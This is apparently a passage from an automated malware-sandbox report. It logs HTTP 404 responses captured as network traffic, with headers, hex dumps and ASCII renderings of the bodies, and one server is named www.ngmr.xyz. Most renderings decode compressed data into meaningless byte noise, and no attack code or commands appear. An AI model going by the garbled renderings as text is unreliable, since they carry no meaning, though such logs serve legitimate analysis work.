70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Sat, 11 Jan 2025 05:32:16 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Sat, 11 Jan 2025 05:32:19 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Sat, 11 Jan 2025 05:32:22 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Sat, 11 Jan 2025 05:55:42 GMTX-Varnish: 1719142264Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Sat, 11 Jan 2025 05:55:45 GMTX-Varnish: 1719142286Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Sat, 11 Jan 2025 05:55:47 GMTX-Varnish: 1719142305Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Sat, 11 Jan 2025 05:55:50 GMTX-Varnish: 1719142311Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Sat, 11 Jan 2025 05:32:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingStatus: 404 Not FoundX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffCache-Control: no-cacheX-Request-Id: 5e9bfc8ea0ff8853fd2beccdb4380833X-Runtime: 0.061585Content-Encoding: gzipData Raw: 34 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 56 4b 6f db 38 10 be f7 57 4c 7d 58 da 1b 3d e2 20 ed 02 b1 e5 22 69 b3 45 80 4d 52 b4 0d f6 60 18 05 2d 8d 65 26 14 a9 25 29 3b da 24 ff bd 43 49 7e 24 e9 61 2f eb 83 45 ce 7c c3 79 f0 9b 91 c6 4b 57 c8 c9 1b 80 f1 12 79 e6 17 b4 74 c2 49 9c 7c e1 39 82 d2 0e 16 ba 52 19 84 f0 cd 19 71 27 54 2e eb 71 dc 42 5a 78 81 8e 83 c8 92 de 4a e0 ba d4 c6 f5 40 f1 02 f7 f7 a9 56 0e 95 4b 7a 6b 91 b9 65 92 e1 4a a4 18 36 9b 00 84 12 4e 70 19 da 94 4b 4c 86 d1 61 00 05 bf 17 45 55 ec 44 3d 88 3b 6f 52 a8 3b 58 1a 5c 24 6c e9 5c 69 4f e2 78 41 a7 db 28 d7 3a 97 c8 4b 61 a3 54 17 71 6a ed 87 05 2f 84 ac 93 4b af 47 63 b8 7b bc 2e 51 1d 7c e3 ca 32 30 28 13 66 5d 2d d1 2e 11 1d 03 57 97 98 30 87 f7 ce 1b b3 d7 fe e2 98 5b 8b e4 ca 6e 2b d1 b8 6a a5 f1 f1 e1 71 d8 9e 17 79 fb ff ea e0 6d 18 4e c5 02 a4 43 b8 38 87 3f 66 ad 98 14 8d e9 66 07 10 51 b9 10 1e a0 e4 59 46 be 43 a7 cb 13 18 be 3f 2c ef 47 f0 b4 b1 89 f7 8c c6 6f a7 a8 32 b1 98 85 61 27 b0 a9 11 a5 6b e3 e8 35 71 dc f2 15 6f a5 bd 16 13 c7 f0 b9 29 24 9c 2a 2e 6b 27 52 db c8 fb 8b 4a a5 4e 68 d5 17 81 0d 74 90 07 26 e0 41 31 78 10 53 d6 1a 6c f1 d7 f3 5b 4c 1d 9b 25 66 24 a6 66 96 f8 bf c7 c7 ad fd e0 a1 0b b6 ef 15 d1 3f 49 fb 78 7c 9c ce 06 51 59 d9 65 9f 9b bc 2a 88 2e 76 f0 14 34 4a 99 0c 7f 57 b8 86 4f dc 61 7f 30 e2 09 55 d8 20 6d ce 25 7a 60 5f 0f 82 ee d0 82 74 39 ba 4e 61 cf ea ef 3c bf 22 36 12 64 7a 38 1b f1 88 db 5a a5 c9 90 56 d6 a4 49 3e 2a a2 92 1b 82 5e e9 0c 23 a1 88 27 ee 0c 17 da 60 df a7 d7 9d fa 34 e8 af 85 ca f4 3a c8 74 da c4 16 b0 b6 6c 2c 20 5a ac d7 eb 8e 7e 21 df 54 a1 65 c6 76 77 6b 09 99 73 36 18 bd e9 ce cc 79 9f b5 59 b0 00 d8 cd 69 78 f4 6e 78 74 4c bf f0 bd 17 f0 ca 69 8f de 81 89 64 8d 42 69 55 17 e2 5f bc 28 69 eb 4c 85 2f 50 2a f3 b0 92 da d7 37 20 ad 1f 9e 1b 9d 34 46 94 d3 68 73 e3 e7 d4 df bf bc 75 e2 53 93 65 33 21 e2 cd 88 18 cf 75 56 77 94 ca c4 0a 52 49 1d 90 b0 79 1e 4a 9d 6b 36 19 c7 24 7d ad 6f f8 2b 45 be 74 a1 e7 1e db 12 7d 0f 93 6a 79 c4 76 9c 1f 2f 87 13 f8 72 fa f9 1c ae ae bf c3 9f d7 37 57 9f 22 8a 63 b8 87 28 27 67 95 03 6a a0 5a 57 cc 90 03 ad 7d 6b 82 d3 30 af 84 cc bc dc 80 5e 2b 58 e3 dc 0a 87 01 c5 6f e2 89 87 af 90 26 53 81 1e eb 96 08 c6 c7 06 a5 e4 29 92 97 72 df 49 17 5f 6f 5e 39 a7 95 ed ed 74 a4 e5 db 0a 34 5a c8 b8 b9 0b e7 39 7b 31 a6 3c 4b 5e 4c 8e 0f 95 2b 7e 58 0a 30 c5 84 c6 c7 6f 7e 5b 60 26 aa 22 11 34 31 0d 5d 46 23 Data Ascii: 412VKo8WL}X= "iEMR`-e&%);$CI~$a/E|yKWytI|9Rq'T.qBZx
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Sat, 11 Jan 2025 05:32:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingStatus: 404 Not FoundX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffCache-Control: no-cacheX-Request-Id: 332091dbd504ab19ca6a74e331d4f33eX-Runtime: 0.025505Content-Encoding: gzipData Raw: 34 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 56 4b 6f db 38 10 be f7 57 4c 7d 58 da 1b 3d e2 20 ed 02 b1 e5 22 69 b3 45 80 4d 52 b4 0d f6 60 18 05 2d 8d 65 26 14 a9 25 29 3b da 24 ff bd 43 49 7e 24 e9 61 2f eb 83 45 ce 7c c3 79 f0 9b 91 c6 4b 57 c8 c9 1b 80 f1 12 79 e6 17 b4 74 c2 49 9c 7c e1 39 82 d2 0e 16 ba 52 19 84 f0 cd 19 71 27 54 2e eb 71 dc 42 5a 78 81 8e 83 c8 92 de 4a e0 ba d4 c6 f5 40 f1 02 f7 f7 a9 56 0e 95 4b 7a 6b 91 b9 65 92 e1 4a a4 18 36 9b 00 84 12 4e 70 19 da 94 4b 4c 86 d1 61 00 05 bf 17 45 55 ec 44 3d 88 3b 6f 52 a8 3b 58 1a 5c 24 6c e9 5c 69 4f e2 78 41 a7 db 28 d7 3a 97 c8 4b 61 a3 54 17 71 6a ed 87 05 2f 84 ac 93 4b af 47 63 b8 7b bc 2e 51 1d 7c e3 ca 32 30 28 13 66 5d 2d d1 2e 11 1d 03 57 97 98 30 87 f7 ce 1b b3 d7 fe e2 98 5b 8b e4 ca 6e 2b d1 b8 6a a5 f1 f1 e1 71 d8 9e 17 79 fb ff ea e0 6d 18 4e c5 02 a4 43 b8 38 87 3f 66 ad 98 14 8d e9 66 07 10 51 b9 10 1e a0 e4 59 46 be 43 a7 cb 13 18 be 3f 2c ef 47 f0 b4 b1 89 f7 8c c6 6f a7 a8 32 b1 98 85 61 27 b0 a9 11 a5 6b e3 e8 35 71 dc f2 15 6f a5 bd 16 13 c7 f0 b9 29 24 9c 2a 2e 6b 27 52 db c8 fb 8b 4a a5 4e 68 d5 17 81 0d 74 90 07 26 e0 41 31 78 10 53 d6 1a 6c f1 d7 f3 5b 4c 1d 9b 25 66 24 a6 66 96 f8 bf c7 c7 ad fd e0 a1 0b b6 ef 15 d1 3f 49 fb 78 7c 9c ce 06 51 59 d9 65 9f 9b bc 2a 88 2e 76 f0 14 34 4a 99 0c 7f 57 b8 86 4f dc 61 7f 30 e2 09 55 d8 20 6d ce 25 7a 60 5f 0f 82 ee d0 82 74 39 ba 4e 61 cf ea ef 3c bf 22 36 12 64 7a 38 1b f1 88 db 5a a5 c9 90 56 d6 a4 49 3e 2a a2 92 1b 82 5e e9 0c 23 a1 88 27 ee 0c 17 da 60 df a7 d7 9d fa 34 e8 af 85 ca f4 3a c8 74 da c4 16 b0 b6 6c 2c 20 5a ac d7 eb 8e 7e 21 df 54 a1 65 c6 76 77 6b 09 99 73 36 18 bd e9 ce cc 79 9f b5 59 b0 00 d8 cd 69 78 f4 6e 78 74 4c bf f0 bd 17 f0 ca 69 8f de 81 89 64 8d 42 69 55 17 e2 5f bc 28 69 eb 4c 85 2f 50 2a f3 b0 92 da d7 37 20 ad 1f 9e 1b 9d 34 46 94 d3 68 73 e3 e7 d4 df bf bc 75 e2 53 93 65 33 21 e2 cd 88 18 cf 75 56 77 94 ca c4 0a 52 49 1d 90 b0 79 1e 4a 9d 6b 36 19 c7 24 7d ad 6f f8 2b 45 be 74 a1 e7 1e db 12 7d 0f 93 6a 79 c4 76 9c 1f 2f 87 13 f8 72 fa f9 1c ae ae bf c3 9f d7 37 57 9f 22 8a 63 b8 87 28 27 67 95 03 6a a0 5a 57 cc 90 03 ad 7d 6b 82 d3 30 af 84 cc bc dc 80 5e 2b 58 e3 dc 0a 87 01 c5 6f e2 89 87 af 90 26 53 81 1e eb 96 08 c6 c7 06 a5 e4 29 92 97 72 df 49 17 5f 6f 5e 39 a7 95 ed ed 74 a4 e5 db 0a 34 5a c8 b8 b9 0b e7 39 7b 31 a6 3c 4b 5e 4c 8e 0f 95 2b 7e 58 0a 30 c5 84 c6 c7 6f 7e 5b 60 26 aa 22 11 34 31 0d 5d 46 23 Data Ascii: 412VKo8WL}X= "iEMR`-e&%);$CI~$a/E|yKWytI|9Rq'T.qBZx
